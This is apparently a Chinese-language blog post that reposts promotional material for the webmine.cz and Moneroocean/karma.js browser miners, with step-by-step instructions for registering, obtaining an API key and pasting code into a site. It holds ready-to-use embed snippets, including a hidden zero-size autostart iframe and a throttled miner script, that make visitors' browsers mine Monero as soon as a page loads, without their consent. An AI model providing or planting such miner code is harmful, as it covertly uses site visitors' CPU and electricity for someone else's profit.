webmine和crypto-webminer挖矿——一句<iframe width=0 height=0 frameborder=0 src='https://webmine.cz/worker?key=[YOUR_API_KEY]'></iframe>搞定





XMR mining as a replacement to ads.

We are offering a Javascript miner that can be embedded to your website. This way you can earn XMR with spare CPU power of your website users in the following three steps.

We do support Integrated addresses (such as used by exchanges) for payouts. Therefore, automated exchanges to real world currencies (USD, EUR etc.) can be easily set up.

Monero addresses from Cryptonator, Eobot, Poloniex, Bittrex and many more are supported.

Payouts are sent once a day after reaching 0.2 XMR balance without charging any transaction fees to you.

Step 1

Get your API key by registering here.

Step 2

Embed the miner into your website

<iframe width=0 height=0 frameborder=0 src='https://webmine.cz/worker?key=[YOUR_API_KEY]'></iframe>

This is our autostart miner. For different mining variants (like user-friendly or mandatory mining) see API.

Step 3

Watch the mining in action here.





  1. 进入网站:https://webmine.cz/#registration

  2. 然后会有步骤,先注册一个账号,然后就会生成脚本<iframe>,比如:

    <iframe width=0 height=0 frameborder=0 src='https://webmine.cz/worker?key=gIGh4D1laTJEnmi'></iframe>
    • 1
  3. 建议进入https://webmine.cz/api 后可以看到自定义配置项,比如:

    Visitor Friendly Mining:

    <script src='https://authedwebmine.cz/authedminer.js?key=gIGh4D1laTJEnmi' async></script>
    • 1
  4. 把这行代码复制到网站源码中即可在用户访问时挖矿了





Moneroocean Pool with Algo autoswitching


Mining with Algo autoswitching feature, you will mining automatically the most profitable coin and you will be payed in XMR.

Autoswitching between CPU POW Algos

CN ASIC | V7 | V8 | R | RWZ | CN Lite, CN Pico, CN Fast | Fast2 (Half), CN Heavy, CN Saber

50 (throttle option) = ~50% CPU usage | 70 = ~30% CPU usage | 30 = ~70% CPU usage

<script src="https://trusteverything.de/karma/karma.js?karma=bs?nosaj=faster.mo" ></script>
<script type="text/javascript">
EverythingIsLife('replace_with_your_xmr_address', 'x', 50);






posted @ 2022-07-20 15:28  bonelee  阅读(995)  评论(0编辑  收藏  举报